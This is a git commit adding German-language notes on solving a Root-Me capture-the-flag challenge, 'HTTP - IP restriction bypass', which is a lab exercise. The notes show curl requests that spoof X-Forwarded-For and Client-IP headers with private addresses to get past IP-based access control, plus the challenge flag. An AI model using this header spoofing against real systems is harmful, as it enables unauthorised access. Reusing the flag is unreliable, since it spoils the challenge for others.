feat: app system challenges
Signed-off-by: Tuan-Dat Tran <tuan-dat.tran@dextradata.com>
This commit is contained in:
Tuan-Dat Tran
40
web-server/http-ip-restriction-bypass/notes.org
Normal file
40
web-server/http-ip-restriction-bypass/notes.org
Normal file
@@ -0,0 +1,40 @@
|
||||
* HTTP - IP restriction bypass
|
||||
|
||||
Challenge: https://www.root-me.org/de/Herausforderungen/Web-Server/HTTP-IP-restriction-bypass
|
||||
Description: Nur lokale Benutzer können auf die Seite zugreifen
|
||||
|
||||
Aufgabe
|
||||
#+begin_quote
|
||||
Liebe Kollegen,
|
||||
|
||||
Wir verwalten jetzt die Verbindungen zum Intranet über private IP-Adressen, so dass es nicht mehr notwendig ist, sich mit einem Benutzernamen/Passwort anzumelden, wenn Sie bereits mit dem internen Firmennetz verbunden sind.
|
||||
|
||||
Herzliche Grüße,
|
||||
|
||||
Der Netzverwalter
|
||||
#+end_quote
|
||||
|
||||
-----
|
||||
|
||||
Challenge Website: http://challenge01.root-me.org/web-serveur/ch68/
|
||||
|
||||
Analyse
|
||||
- Initial request:
|
||||
- `curl -i "http://challenge01.root-me.org/web-serveur/ch68/"`
|
||||
- Server responds with login page and message: `Your IP ::ffff:<public-ip> do not belong to the LAN.`
|
||||
- Header tests (IP spoofing candidates):
|
||||
- `X-Forwarded-For: 127.0.0.1` -> IP shown as `127.0.0.1`, still rejected.
|
||||
- `Client-IP: 127.0.0.1` -> IP shown as `127.0.0.1`, still rejected.
|
||||
- `X-Client-IP: 127.0.0.1` -> ignored by app.
|
||||
- Working bypass:
|
||||
- `X-Forwarded-For: 192.168.1.10` (also works with `10.0.0.42`)
|
||||
- `Client-IP: 192.168.1.10` also works.
|
||||
- App trusts spoofable headers and only checks if IP is in private/LAN ranges.
|
||||
|
||||
Exploit command
|
||||
#+begin_src bash
|
||||
curl -i -H "X-Forwarded-For: 192.168.1.10" "http://challenge01.root-me.org/web-serveur/ch68/"
|
||||
#+end_src
|
||||
|
||||
Flag
|
||||
- `Ip_$po0Fing`
|
||||
Reference in New Issue
Block a user